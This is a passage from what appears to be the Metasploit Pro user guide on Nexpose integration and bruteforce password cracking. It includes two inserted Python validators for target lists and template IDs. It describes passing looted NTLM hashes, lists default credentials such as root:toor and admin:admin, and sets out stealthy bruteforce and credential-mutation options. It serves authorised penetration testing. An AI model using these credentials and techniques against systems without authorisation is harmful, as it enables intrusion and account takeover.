7. Select Do not change existing hosts if you want to retain the current host information.

8. Click the Import button.

Excluding Hosts from a Nexpose Data Import


If you do not want Metasploit Pro to import specific hosts from a Nexpose report, you can exclude those hosts from the import. To exclude hosts during an import, type the host addresses that you want to exclude in the Exclude Addresses field.

Running a Nexpose Scan


1. From within a project, click the Analysis tab.

2. Click Nexpose from the Quick Tasks menu.

3. Select a Nexpose Console. The list shows Nexpose consoles that you have added to the project.

4. Enter the addresses for the scan targets. You can specify an IP address or a host name. There can be one address on each line. Note: You can use standard IPv6 addressing to define individual IPv6 addresses. For example, use fe80::202:b3ff:fe1e:8329 for single addresses and 2001:db8::/32 for CIDR notations. For link local addresses, you must append the interface ID to the address. For example, enter fe80::1%eth0 for a link local address.

5. Select a scan template.

6. Click Show Advanced Options to configure additional options for the scan.

7. Launch the Nexpose scan.

Running a Nexpose Scan with a Custom Template


To use a custom scan template for a Nexpose scan, you must supply the scan template ID, not the scan template name. To identify the scan template ID, log into the Nexpose Security Console, select Administration > Scan Templates, and choose the scan template that you want to use.

When the Scan Template Configuration page displays, locate the URL address box at the top of the Nexpose Console. The URL address box displays the address and the template ID for the scan template. For example, in the following address, https://my.console.address:3780/admin/wizard/scantemplate.html?templateid=dos-audit, the template ID is dos-audit. For more information on scan template IDs, visit the Nexpose documentation.

1. From within a project, click the Analysis tab.

2. Click Nexpose from the Quick Tasks menu.

3. Select a Nexpose Console. The list shows Nexpose consoles that you have added to the project.

4. Enter the addresses for the scan targets. You can specify an IP address or a host name. There can be one address on each line.

5. Click the Scan Template list. Choose Custom, which enables you to select a custom scan template.

6. Click Show Advanced Options.

7. From the Advanced Nexpose Scan Settings area, enter the scan template ID that you want to use in the Custom scan template name field. Note: Scan template IDs cannot contain a hyphen. If the scan template ID contains a hyphen, replace the hyphen with an underscore. If the scan template ID changes, the Nexpose scan does not update the scan template ID. You must update the Nexpose scan to use the new scan template ID.

8. Launch the Nexpose scan.
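The following Python script is an added example, not code from Metasploit Pro or this guide. It runs the pre-flight checks a practitioner would want before launching a Nexpose scan from Metasploit Pro: it validates a scan target list in the formats the guide describes (single IPv4/IPv6 addresses, comma-separated lists, hyphenated ranges, CIDR notation, and link-local IPv6 with an interface ID), counts the hosts it denotes against the 32-host Community license cap, and extracts a scan template ID from a console URL and converts its hyphens to underscores as the note above requires. The console URL and target list embedded in it are constructed samples.

```python
"""Pre-flight checks for a Nexpose scan launched from Metasploit Pro.

Added example, not part of the Metasploit Pro product. It validates the
scan-target formats the guide lists and normalizes a custom scan template
ID the way the guide's note requires.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlparse

# Host cap the guide gives for a Nexpose Community license.
COMMUNITY_HOST_LIMIT = 32

# Constructed console URL in the form the guide shows (not a real console).
EXAMPLE_TEMPLATE_URL = (
    "https://my.console.address:3780/admin/wizard/scantemplate.html?templateid=dos-audit"
)

_HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*"
)
_ZONE_RE = re.compile(r"[A-Za-z0-9_.-]+")


def count_targets(token):
    """Return how many hosts one target token denotes, or raise ValueError.

    Accepted forms (all from the guide): single IPv4/IPv6 address, CIDR block,
    hyphenated IPv4 range, link-local IPv6 with interface ID, or a host name.
    """
    token = token.strip()
    if not token:
        raise ValueError("empty target")
    if "%" in token:  # link-local IPv6 such as fe80::1%eth0
        addr, zone = token.split("%", 1)
        ip = ipaddress.ip_address(addr)
        if ip.version != 6 or not ip.is_link_local:
            raise ValueError(f"interface ID only allowed on link-local IPv6: {token}")
        if not _ZONE_RE.fullmatch(zone):
            raise ValueError(f"malformed interface ID: {token}")
        return 1
    if "/" in token:  # CIDR notation, IPv4 or IPv6
        return ipaddress.ip_network(token, strict=False).num_addresses
    if "-" in token and token[0].isdigit():  # hyphenated IPv4 range
        start, end = (ipaddress.IPv4Address(p.strip()) for p in token.split("-", 1))
        if end < start:
            raise ValueError(f"range end precedes start: {token}")
        return int(end) - int(start) + 1
    try:
        ipaddress.ip_address(token)
        return 1
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(token):
        return 1
    raise ValueError(f"unrecognized target: {token}")


def check_scan_targets(text, host_limit=COMMUNITY_HOST_LIMIT):
    """Validate a target list (one per line, commas allowed) against a license cap.

    Returns {"hosts": total, "ok": bool, "errors": [messages]}. A list with
    errors, or with more hosts than the license allows, is reported as not ok;
    the guide states that exceeding the licensed host count makes the scan fail.
    """
    total, errors = 0, []
    for line in text.splitlines():
        for token in line.split(","):
            if not token.strip():
                continue
            try:
                total += count_targets(token)
            except ValueError as exc:
                errors.append(str(exc))
    return {"hosts": total, "ok": not errors and total <= host_limit, "errors": errors}


def template_id_from_url(url):
    """Pull the templateid query parameter from a Scan Template Configuration URL."""
    ids = parse_qs(urlparse(url).query).get("templateid")
    if not ids:
        raise ValueError("URL carries no templateid parameter")
    return ids[0]


def custom_template_field(template_id):
    """Value for the Custom scan template name field: hyphens become underscores."""
    return template_id.replace("-", "_")


if __name__ == "__main__":
    # Constructed sample list: two IPv4 hosts, one IPv6 host, one link-local host.
    sample = "192.168.1.1, 192.168.1.2\nfe80::202:b3ff:fe1e:8329\nfe80::1%eth0"
    print(check_scan_targets(sample))
    print(custom_template_field(template_id_from_url(EXAMPLE_TEMPLATE_URL)))
```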

Purging Scan Data


A purge removes all scan data from the Nexpose Console and ensures optimal performance from the Nexpose scanner. If you enable the purge scan option, Nexpose automatically deletes the scan data when the scan completes.

1. Open a project.

2. Click the Analysis tab.

3. Click Nexpose from the Quick Tasks menu.

4. Select a Nexpose Console. The list shows Nexpose consoles available for the project.

5. Enter addresses for the scan targets.

6. You can specify an IP address or a host name. There can be one address on each line. Metasploit Pro supports IPv4 and IPv6 addresses. You can use standard IPv6 addressing to define individual IPv6 addresses. For example, use fe80::202:b3ff:fe1e:8329 for single addresses and 2001:db8::/32 for CIDR notations. For link local addresses, you must append the interface ID to the address. For example, enter fe80::1%eth0 for a link local address.

7. Select a scan template.

8. Click Show Advanced Options to configure additional options for the scan.

9. Select the Purge Scan results upon completion option.

10. Launch the Nexpose scan.

Passing the Hash from Metasploit


Passing the hash is a technique that enables attackers to use the password hash to authenticate to a remote server or service. During exploitation, Metasploit Pro collects data, such as password hashes, from the exploited system. After Metasploit Pro collects password hashes from a target, it can pass the hash to Nexpose and run a Nexpose scan to perform a credential scan.

Note: Before you can pass the hash in Metasploit Pro, you must configure a Nexpose Console from the Global Settings. After you configure a Nexpose Console, you can launch a Nexpose scan from the Metasploit Pro interface to pass the hash to the Nexpose scan.

1. From within a project, click the Analysis tab.
2. Click Nexpose from the Quick Tasks menu.
3. Select a Nexpose Console. The list shows Nexpose consoles that are available for the project.
4. Enter addresses for the scan targets. You can specify an IP address or a host name. There can be one address on each line. Metasploit Pro supports IPv4 and IPv6 addresses. You can use standard IPv6 addressing to define individual IPv6 addresses. For example, use fe80::202:b3ff:fe1e:8329 for single addresses and 2001:db8::/32 for CIDR notations. For link local addresses, you must append the interface ID to the address. For example, enter fe80::1%eth0 for a link local address.
5. Select a scan template.
6. Click Show Advanced Options to configure additional options for the scan.
7. Select Pass the LM/NTLM hash credentials. The Hash Credentials box displays. Metasploit Pro automatically populates the Hash Credentials box with a list of looted hashes. You can modify or add hashes to the hash list.
8. Launch the Nexpose scan.


Searching for Tagged Nexpose Assets


You can use any search field in the Metasploit Web UI to search for tagged assets. To search for a tag, prefix the tag with the hash (#) symbol. Metasploit Pro returns a list of all assets that use the tag. For example, if you search for #nexpose, Metasploit Pro returns any host that references that tag.

Importing Nexpose Data


You can import data from Nexpose if you have a site that you have already scanned and want to bring those assets into Metasploit Pro for further testing. You can either import a site from a Nexpose Console or import scan data from a Nexpose XML export.

To import a Nexpose XML export:


1. Open the project that you want to import data into.
2. From the Tasks bar, click the Import button. The Import Data page appears.
3. Click the Choose File button to find the file you want to import. The File Upload window appears.

Note: Metasploit Pro supports the following Nexpose export types: XML Export, XML Export 2.0, and Nexpose Simple XML Export.

4. Find and choose the Nexpose export you want to import.
5. Click Open after you select the file.
6. If you want to specify an exclusion list, enter the target addresses that you do not want to import in the Exclude Addresses field.

Note: You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.

7. Select Do not change existing hosts if you do not want subsequent scans to modify the host information.
8. Select if you want Metasploit Pro to automatically tag hosts with their OS as the system imports them.
9. Enable any additional tags that you want to assign to the assets.
10. Import the data.
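The target and exclusion address boxes in the scan and import procedures above take one entry per line in the forms the guide describes: a single IPv4 or IPv6 address, a CIDR block such as 2001:db8::/32, a link-local address with its interface ID such as fe80::1%eth0, an address range, or a host name. The following Python parser is an added example, not code from Metasploit Pro or this guide: it validates such a list before you paste it into the UI and shows which addresses remain after an exclusion list is applied. The function names and the sample entries other than the guide's own IPv6 examples are mine; the first-last range form is assumed.

```python
import ipaddress
import re

# A DNS host name: dot-separated labels of letters, digits and hyphens.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# Entries made only of digits, dots, colons, slashes, hyphens and '%' were meant
# to be addresses; if they did not parse they are malformed, not host names.
_ADDRESS_SHAPED_RE = re.compile(r"^[0-9.:/%-]+$")


def _parse_ip_entry(text):
    """Read TEXT as an IP, a CIDR block, a first-last range, or a link-local address.

    Returns a list of (network, zone) tuples, zone being the interface ID after
    '%' (or None), or returns None when TEXT is not IP-shaped at all so the
    caller can try it as a host name.
    """
    zone = None
    if "%" in text:  # fe80::1%eth0 style: keep the interface ID separately
        text, zone = text.split("%", 1)
    if "-" in text and "/" not in text:  # explicit range: first-last (assumed form)
        try:
            first, last = (ipaddress.ip_address(p.strip()) for p in text.split("-", 1))
        except ValueError:
            return None
        if first.version != last.version or last < first:
            raise ValueError(f"bad address range: {text!r}")
        nets = list(ipaddress.summarize_address_range(first, last))
    else:
        try:
            nets = [ipaddress.ip_network(text, strict=False)]
        except ValueError:
            return None
    if zone is not None and any(n.version != 6 or not n.is_link_local for n in nets):
        raise ValueError(f"interface ID is only valid on an IPv6 link-local address: {text}%{zone}")
    return [(n, zone) for n in nets]


def parse_address_list(text):
    """Parse one entry per line, as the Metasploit Pro address boxes expect.

    Returns (networks, hostnames): networks is a list of (network, zone)
    tuples; hostnames is a list of lower-cased DNS names.
    """
    networks, hostnames = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        nets = _parse_ip_entry(line)
        if nets is not None:
            networks.extend(nets)
        elif _ADDRESS_SHAPED_RE.match(line) or not _HOSTNAME_RE.match(line):
            raise ValueError(f"unrecognized address entry: {line!r}")
        else:
            hostnames.append(line.lower())
    return networks, hostnames


def is_valid_address_list(text):
    """True when every line parses; False on the first malformed entry."""
    try:
        parse_address_list(text)
    except ValueError:
        return False
    return True


def _subtract(network, excluded):
    """Return the pieces of NETWORK that are not covered by EXCLUDED."""
    if network.version != excluded.version or not network.overlaps(excluded):
        return [network]
    if network.subnet_of(excluded):  # fully excluded (or equal)
        return []
    return list(network.address_exclude(excluded))  # excluded is a strict subnet


def effective_targets(targets_text, exclude_text=""):
    """Apply an exclusion list to a target list and return what would be scanned."""
    targets, target_names = parse_address_list(targets_text)
    excludes, excluded_names = parse_address_list(exclude_text)
    networks = []
    for net, zone in targets:
        pieces = [net]
        for ex, _ in excludes:
            pieces = [p for piece in pieces for p in _subtract(piece, ex)]
        networks.extend((p, zone) for p in pieces)
    names = [n for n in target_names if n not in set(excluded_names)]
    return networks, names


def address_count(networks):
    """Number of individual addresses covered by a parsed network list."""
    return sum(net.num_addresses for net, _ in networks)


if __name__ == "__main__":
    # Constructed sample lists; the IPv6 entries are the guide's own examples.
    targets = "10.0.0.0/24\nfe80::202:b3ff:fe1e:8329\n2001:db8::/32\nfe80::1%eth0\nweb-01.example.com"
    excludes = "10.0.0.0/25\n10.0.0.200-10.0.0.203"
    nets, names = effective_targets(targets, excludes)
    for net, zone in nets:
        print(net if zone is None else f"{net}%{zone}")
    print("host names:", names)
    print("addresses covered:", address_count(nets))
```

Running the block prints the surviving blocks of 10.0.0.0/24 (the upper half minus 10.0.0.200/30), the two IPv6 entries, the link-local address with its interface ID, and the host name; a link-local interface ID on a global address, a reversed range, or a short-form range such as 10.0.0.1-20 is rejected before it reaches the UI.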

To import data from a Nexpose site:


1. Verify that you have a Nexpose Console configured globally.

Note: For more information on configuring a Nexpose Console, see Configuring a Nexpose Console on page 200.

1. Open the project that you want to import data into.
2. From the Tasks bar, click the Import button. The Import Data page appears.
3. Click the Choose File button to find the file you want to import. The File Upload window appears.

Note: Metasploit Pro supports the following Nexpose export types: XML Export, XML Export 2.0, and Nexpose Simple XML Export.

4. Find and choose the Nexpose export you want to import.
5. Click Open after you select the file.
6. If you want to specify an exclusion list, enter the target addresses that you do not want to import in the Exclude Addresses field.

Note: You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.

7. Select Do not change existing hosts if you do not want subsequent scans to modify the host information.
8. Select if you want Metasploit Pro to automatically tag hosts with their OS as the system imports them.
9. Enable any additional tags that you want to assign to the assets.
10. Import the data.


Vulnerability Exceptions
An exception defines a scenario where it is acceptable for a vulnerability to exist. When you define an exception for a vulnerability, you exclude it from a report and consider the vulnerability an accepted risk. For example, you may want to define an exception for a vulnerability that poses minimal security risk but requires more resources to fix than you want to invest. In this particular case, it may be more cost effective to accept the vulnerability as a known risk than to remediate it. When you import Nexpose data or perform a Nexpose scan, Metasploit Pro pulls the exception data for the vulnerability and stores it in the project. After you test and verify the vulnerabilities, you may want to use the results of the penetration test to update the vulnerability exception for each asset. Use the Nexpose Exception Push feature in Metasploit Pro to create and approve vulnerability exceptions for an asset. After you define the exceptions, you can export, or push, the vulnerability exceptions from Metasploit Pro to Nexpose. The Nexpose Console displays the updated vulnerability exception information on the Asset Summary page.

Note: You can only create an exception for a vulnerability that you import from Nexpose.

Reasons for Vulnerability Exceptions


A vulnerability exception can exist due to any of the following reasons:

- False positive - You may want to exclude false positives reported by Nexpose. A false positive occurs when a vulnerability scanner detects a vulnerability when none exists.
- Compensating control - You may want to exclude vulnerabilities whose risk is mitigated. For example, if a vulnerability exists on a device that has a firewall in place, an organization may determine that the firewall provides enough protection and classify the vulnerability as a minimal threat.
- Acceptable use - You may want to create an exception for vulnerabilities that are part of organizational practices.
- Acceptable risk - You may want to exclude vulnerabilities that are low risk. These vulnerabilities tend to pose minimal security risk and are likely to consume more resources to fix than they are worth.

Creating a Vulnerability Exception


To create a vulnerability exception, your project must contain assets from a Nexpose scan or import. You must also have an active Nexpose Console configured for the project. Metasploit Pro connects to the Nexpose Console that you configured for the project to create vulnerability exceptions for an asset.

If the project does not contain an active Nexpose Console or assets, the Nexpose Exception Push feature is unavailable. When you import or scan assets from Nexpose, you should enable automatic tagging. A tag is a label that you apply to assets in order to group them together based on a set of criteria. A tag helps you quickly identify and find assets to run tests against.

1. Select Project > [Project Name] > Vulnerabilities from the main menu.
2. When the list of assets and vulnerabilities appears, select the assets that you want to use to create vulnerability exceptions.
3. Click Nexpose Exceptions.
4. When the New Nexpose Exceptions Push window appears, choose the Nexpose Console that you want to use to push the vulnerability exceptions.
5. Choose if you want to automatically approve the vulnerability exception. If you do enable this option, you will need to approve the vulnerability request through the Nexpose Console.
6. Choose if you want to set an expiration date for the vulnerability exception. If you choose this option, Nexpose will remove the exception from the asset on the date that you specify.
7. The Vulnerability Exceptions area displays a table that lists the vulnerability information for each asset that you added to the exception push. Select the vulnerability that you want to create an exception for.
8. Choose a reason for the exception.
9. Add any additional comments about the exception, such as how the vulnerability meets the requirements for the exception.
10. Create the exceptions.

After you create the exceptions, open the Nexpose Console and verify that the asset shows the vulnerability exception that you pushed from Metasploit Pro.


Nexpose Asset Groups


In Nexpose, an asset group represents the logical grouping of assets. Assets within an asset group may share some commonality, such as operating systems or services. You create asset groups so that you can easily assign a set of assets to a specific user. Any user who has access to the asset group can monitor and remediate the vulnerabilities that Nexpose identifies for the assets within the group. In Metasploit Pro, host tags behave similarly to asset groups. Host tags help you logically group hosts, or assets, based on a set of criteria. For example, you can use tags to group together machines that are exploitable or to identify machines that have weak passwords. Host tags are particularly useful if you want to use the results of a penetration test to create an asset group in Nexpose. In Metasploit Pro, you can search for assets based on their host tag and create an asset group for those assets.

Creating a Nexpose Asset Group


To create a Nexpose asset group, your project must contain assets from a Nexpose scan or import. You must also have an active Nexpose Console configured for the project. Metasploit Pro connects to the Nexpose Console that you configure for the project to create asset groups. If the project does not contain an active Nexpose Console or assets, the Nexpose Asset Group Push feature is unavailable. Additionally, to utilize the Nexpose Asset Group Push feature, you must apply tags to the assets. A tag logically groups together a set of assets based on a set of criteria. For example, you can tag assets as vulnerable. You can apply tags manually, or you can enable automatic tagging for Nexpose scans and imports.

1. From within a project, click the Tags tab.
2. Select the tags that you want to use to create asset groups.
3. Click Nexpose Push.
4. Choose the Nexpose Console that you want to use to create the asset groups.
5. Enter a descriptive name for the asset group.
6. Enter a description for the asset group.
7. Enter a list of IP addresses for the assets that you want to include in the asset group.
8. Create the asset group.


Automatically Tagging Assets from a Nexpose Scan


1. From within a project, click the Analysis tab.
2. Click Nexpose from the Quick Tasks menu.
3. When the Nexpose configuration page appears, select a Nexpose Console. The Nexpose Console dropdown shows the consoles that you have configured for Metasploit Pro to use.
4. Enter the addresses for target assets that you want to scan. You can specify an IP address or a host name. Enter one entry per line.
5. Select a scan template.
6. Click Show Advanced Options to configure additional options for the scan.
7. Select the Automatically tag by OS option if you want to tag assets with their OS type. For example, Metasploit Pro uses the os_windows tag for Windows systems and the os_linux tag for Linux systems.
8. From the Automatic Tagging area, you can choose or create the tags that you want to apply to the hosts. To create a tag, type the tag name in the empty tag field and select the tag.
9. Launch the Nexpose scan.

Automatically Tagging Assets from a Nexpose Import


1. From within a project, click the Analysis tab.
2. When the Host window appears, click Import.
3. When the Import Data window appears, click Browse to navigate to the file that you want to import.
4. When the File Upload window appears, navigate to and choose the Nexpose XML file to import.
5. Click Open after you select the file.
6. Enter the target addresses that you want to exclude.
7. Select Do not change existing hosts if you do not want the imported information to overwrite the data for an existing host.
8. Select the Automatically tag by OS option if you want to tag assets with their OS type. For example, Metasploit Pro uses the os_windows tag for Windows systems and the os_linux tag for Linux systems.
9. From the Automatic Tagging area, you can choose or create the tags that you want to apply to the hosts. To create a tag, type the tag name in the empty tag field and select the tag.
10. Import the data.


Vulnerability Tracking
The Metasploit Web UI provides an interactive interface that you can use to visualize and validate the vulnerability data from a Nexpose report. Metasploit Pro identifies the assets, imports vulnerability data, indexes the data, and attempts to map each vulnerability to an exploit. Metasploit Pro displays most of the content for each asset on the Hosts page. The Hosts page provides you with a high-level view of the assets that Metasploit Pro imported. You can see the number of services, vulnerabilities, and exploit attempts for each host. If you want to explore further, you can visit the Vulnerabilities tab to learn more about each asset.

Vulnerability Overview Page


The Vulnerability Overview page displays all the vulnerabilities that you import from Nexpose. The Vulnerability Overview page provides you with a broad scope of all the vulnerabilities that have been identified on your assets. View the Vulnerability Overview page to quickly identify the assets that Metasploit Pro has tested and exploited; assets that have not been tested; or assets that are not exploitable.

Viewing the Vulnerability Overview Page


To view the Vulnerabilities Overview page, select Project > [Project Name] > Vulnerabilities from the main menu. A list of vulnerabilities that have been identified within the project displays in the browser.

Vulnerability Details Page


The Vulnerability Details page provides you with the granular details of a vulnerability. When you import vulnerability scan data from Nexpose, Metasploit Pro pulls the vulnerability details from the report, such as the Nexpose console ID, vulnerability name, description, test results, solution, and references. Metasploit Pro displays the vulnerability data for each asset on the Vulnerability Details page. You can leverage the information on the Vulnerability Details page to launch an exploit against the vulnerability. Metasploit Pro automatically maps the vulnerability to a matching exploit based on service and vulnerability information. You can view the matching exploits from the Available Modules tab on the Vulnerability Details page. Note: Metasploit Pro maps vulnerabilities to exploit modules. Other modules, like auxiliary, payload, and post-exploitation modules, are not mapped to vulnerabilities.


Viewing the Vulnerability Details Page


To view the details page for a particular vulnerability, select Project > [Project Name] > Vulnerabilities from the main menu. A list of assets and vulnerabilities appears. Click on the vulnerability name. The details for the vulnerability display in the browser window.

Host Details Page


The Host Details page provides you with a detailed look at a particular host or asset. You can view the Host Details page to see the data collected from a particular host, such as the active services, identified vulnerabilities, credentials, and notes. Use this data to perform further reconnaissance against a target so that you can pinpoint the best method to exploit a system.

Viewing the Host Details Page


To view the details page for a particular host, select Project > [Project Name] > Hosts from the main menu. A list of assets appears. Click on a host name or IP address to view more information about the host. The details for the host display in the browser window.

Attempts Tab
If Metasploit Pro has run any module against the host, you can view the results from the Attempts tab. The Attempts tab shows when the modules were run, the person who launched the module, the result code for the module run, and the reason the module failed or succeeded. For example, you may want to view the Attempts tab if you want to find a list of modules that Metasploit Pro has run against a particular port or service.

Result Codes
A result code provides the reason why a module did not run successfully. The following result codes are available:

- None - Indicates that Metasploit Pro could not determine if the module ran successfully or failed.
- Unknown - Indicates that Metasploit Pro could not determine if the module ran successfully or failed.
- Unreachable - Indicates that Metasploit Pro could not reach the network service.
- Bad-config - Indicates that the exploit settings were not configured correctly.
- Disconnected - Indicates that the network service disconnected during a module run.
- Not-found - Indicates that Metasploit Pro could not find the application or service.
- Unexpected-reply - Indicates that Metasploit Pro did not receive the expected response from the application.
- Timeout-expired - Indicates that a timeout occurred.
- User-interrupt - Indicates that the user stopped the module run.
- No-access - Indicates that Metasploit Pro could not access the application.
- No-target - Indicates that the module configuration was not compatible with the target.
- Not-vulnerable - Indicates that the application was not vulnerable.
- Payload-failed - Indicates that Metasploit Pro delivered a payload, but was unable to open a session.

Modules Tab
Metasploit Pro automatically maps modules to a host based on the open services and vulnerability information that is available. Due to the number of vulnerability checks that are available, Metasploit matches exploits based on services rather than vulnerabilities. The Modules tab displays a full list of exploits and auxiliary modules that Metasploit Pro can run against a particular asset.

Source Tab
The Source tab identifies the device used to import the host. For example, if you imported assets from a Nexpose report, the Source tab shows the Nexpose console ID and device ID.


Chapter 9:

Password Cracking

To learn more about password cracking, read the following topics:


- About Password Cracking on page 218
- Bruteforce Attacks on page 218
- Word Lists on page 232
- Credential Management on page 229

About Password Cracking


After you discover live hosts on the target network, you can execute bruteforce attacks or exploit modules to gain access to the target systems. To gain access to a target, you must identify the security vulnerability that exists on the target and successfully execute the exploit code to establish a connection to the target.

Password Cracking Methods


- Bruteforce Attacks - A bruteforce attack attempts a large number of common user name and password combinations to gain access to hosts. Metasploit Pro provides you with several preset bruteforce profiles that you can use to customize the bruteforce attack for the target environment. When Metasploit Pro successfully identifies a credential in a session-capable module, such as SMB, SSH, Telnet, or MSSQL, the system automatically opens the session.

- John the Ripper - John the Ripper, or JtR, is a tool that you can use to crack password hashes in order to recover weak passwords. To run JtR, you need to perform a module search for John the Ripper. There are JtR modules available for Linux, Windows, Oracle, and MySQL with varying bruteforce modes. Choose the module that works best for your target systems.

Bruteforce Attacks
A bruteforce attack tries a large number of common user name and password combinations in order to open a session on the target machine. After the bruteforce attack successfully guesses a credential, the system stores the user name and password in the workspace. In Metasploit Pro, a bruteforce attack launches service-specific modules to attempt to crack the credentials for the service. You can choose the services and ports that you want to target, and the bruteforce attack chooses modules that target those services. If the bruteforce attack successfully cracks a credential and opens a session, you can use the session to gain further access to and information about the system. To run a bruteforce attack, you must define the services that you want to target on a particular host or network range. In addition to the services, you can configure the bruteforce attack to exclude specific hosts and credentials, perform a dry run, and use a particular payload type.

Bruteforce Message Indicators


Metasploit Pro color codes bruteforce task logs to help you identify successful and unsuccessful attacks. Metasploit Pro records successful attacks in the database as authentication notes. You can view the authentication notes from the Analysis window.


The following list describes the color codes that Metasploit Pro uses for bruteforce tasks:

- Green Message - Good status indicator
- Yellow Message - Credential found indicator
- Red Message - Bad status indicator

Bruteforce Attack Options


The following options are available for you to configure for a bruteforce attack.

Bruteforce Depth: Quick


Identifies the basic password combinations. The Quick depth has the shortest duration because it attempts fewer than 25 known user name and password combinations. The Quick depth uses a static list of credentials and tries them against discovered services. The list of credentials includes:

- Admin:admin
- Admin:admin1
- Admin:admin!
- Test:test
- Test:test1234
- Test123:test123
- cisco:cisco
- user:user
- administrator:administrator
- root:root
- root:toor

After the bruteforce attack tries the static credentials list, it tries the user names with a blank password. The bruteforce attack prepends known credentials to the static list. Metasploit Pro generates approximately 20 credentials in order to bruteforce all services.

Bruteforce Depth: Defaults Only


Attempts a small number of known default user names and passwords. The Defaults Only mode generates the following credentials:

- 16 credentials for PostgreSQL
- 29 credentials for DB2
- 141 credentials for SSH
- 141 credentials for Telnet
- 22 credentials for MSSQL
- 150 credentials for HTTP
- 4 credentials for HTTPS
- 13 credentials for SMB
- 21 credentials for FTP

Bruteforce Depth: Normal


Attempts a fixed maximum number of credentials. The Normal mode takes approximately 5 minutes per host on a fast LAN. The Normal mode focuses on common, protocol-specific user names as well as discovered user names and passwords. The Normal mode identifies discovered passwords from a list of common passwords. Most protocols have common defaults, which Metasploit Pro tries after known good credentials on other services. The Normal mode generates the following credentials:

- 4,000 credentials for PostgreSQL
- 3,000 credentials for DB2
- 10,000 credentials for MySQL
- 1,000 credentials for SSH
- 1,000 credentials for Telnet
- 10,000 credentials for MSSQL
- 6,000 credentials for HTTP
- 1,000 credentials for HTTPS
- 4,000 credentials for SMB
- 1,000 credentials for FTP

The system tries these generated credentials after the currently known good credentials. The system adjusts the credential figures after each successive run, if credentials become known as the modules run.

Bruteforce Depth: Deep


Attempts three times more passwords than the Normal mode. The Deep mode takes 15-20 minutes for each host on a fast LAN, if all services are enabled. The additional passwords come from the common password list. For the few protocols that support fast enough guesses, passwords are subject to a fixed set of transformations. For example, 1 for I and 0 for O. The Deep mode generates the following credentials:

- 12,000 credentials for PostgreSQL:5432
- 9,000 credentials for DB2:50000
- 30,000 credentials for MYSQL:3306
- 132 credentials for SSH:22
- 132 credentials for Telnet:23
- 30,000 credentials for MSSQL:13013
- 18,000 credentials for HTTP:8080 (tomcat)
- 3,000 credentials for SMB:445 (Microsoft)

SSH and Telnet are not subject to the deep multiplier because these credentials take longer to test than the other services.

Bruteforce Depth: 50K


Attempts 50,000 user name and password combinations for each service.

Bruteforce Depth: Imported Only


Uses the user name and password list, or credential file, that you import into the system.

Bruteforce Depth: Known Only


Attempts credentials that are already known for all services in the target workspace. This includes SSH keys and passwords.

Bruteforce Speed: Turbo


Uses the Turbo speed on a fast LAN.


Bruteforce Speed: Fast


Uses the Fast speed on most LANs.

Bruteforce Speed: Normal


Uses the Normal speed for external use.

Bruteforce Speed: Slow


Uses the Slow speed for slow WAN links or to hide the scan.

Bruteforce Speed: Stealthy


Uses the Stealthy speed if you want the attack to be sneaky.

Bruteforce Speed: Glacial


Requires the most amount of time to complete.

Target Services
Bruteforce targets the following services: SMB, PostgreSQL, DB2, MySQL, MSSQL, Oracle, HTTP, HTTPS, SSH, SSH_PUBKEY, Telnet, FTP, POP3, EXEC, LOGIN, SHELL, VNC, SNMP, and AFP.

Target Addresses
Defines the hosts explicitly included in the bruteforce attack.

Excluded Addresses
Defines the hosts explicitly excluded from the bruteforce attack.

Dry run
Runs a bruteforce attack, prints a transcript of the modules, and quits the attack. Metasploit Pro does not run a live bruteforce attack against the target system.

Produce verbose in the output task log


Records the successes and failures of the modules that the bruteforce attack runs.

Additional credentials
Defines the user name and password combinations that the bruteforce attack uses. Use commas to separate user name and password combinations. Use one of the following methods to specify additional credentials for the bruteforce attack:

- For domain-specific user name and password combinations, use the following format: domain/username.password.
- For user names with no password, define the user name only.
- For user names with multiple passwords, use the following format: username password1, password2, password3.

SMB Domains
Adds the domain as a space delimited list for services that accept Windows-based authentication.

Payload Type
Specifies the type of payload that the bruteforce attack uses. You can choose Meterpreter or command shell.

Listener Ports
Defines the port or port range that the bruteforce attack uses in reverse connect payloads.

Connection Type
Defines the connection type that the payload uses. Choose from auto, reverse, or bind.

Auto Launch Macro


Defines the macro that runs during the bruteforce attack. You can create macros from the Global Settings.

Automatically open sessions with guessed credentials


Opens a session when a guessed credential is successful.

Limit to one cracked credential per service


Stops the bruteforce attack after the system collects the first credential.

Max guesses per user


Limits the number of guesses for each user - not each user name.

Timeout per service


Limits the total time that the attack allots to each service instance.

Timeout overall
Limits the total amount of time that the system allocates to the bruteforce attack.

Max guesses overall


Limits the total number of guesses that the bruteforce attack attempts.


Skip blank password generation


Disables the use of blank passwords.

Exclude machine names as passwords


The bruteforce attack does not use known computer names and user names as passwords.

Skip common Windows machine accounts


Skips Windows accounts that do not have remote login rights or that have randomly generated passwords. The accounts include TsInternetUser, krbtgt, NetShowServices, IUSR_<anything>, IWAM_<anything>, and WMUS_USER-<anything>.

Skip common UNIX machine accounts


Skips Unix accounts that don't have remote login rights or that have randomly generated passwords. This includes: daemon, bin, sys, sync, games, man, lp, mail, news, uucp, proxy, www-data, backup, list, irc, gnats, nobody, libuuid, syslog, messagebus, haldaemon, hplip, avahi, couchdb, kernoops, saned, pulse, gdm, sshd, telnetd, dhcp, avahi-autoipd, speech-dispatcher.

SMB: Recombine known, imported, and additional credentials


Takes all the usernames:passwords from the known credentials list, imported list, and credentials textbox, and assigns all the passwords to all users.

SMB: Preserve original domain names


Tries the original domain name.

Mutate known credentials


Determines the portion of the credential list subjected to mutations; in this case, all known credentials.

Mutate imported credentials


Determines the portion of the credential list subjected to mutations; in this case, all imported credentials.

Mutate additional credentials


Determines the portion of the credential list subjected to mutations; in this case, all credentials manually added by the user.

Mutation: append numbers to candidate passwords


Strips all trailing digits from a password, replaces them with a single digit, and skips all passwords that do not contain a letter.


Mutation: prepend numbers to candidate passwords


Strips all digits from the beginning of a password, replaces them with a single digit, and skips all passwords that do not contain a letter.

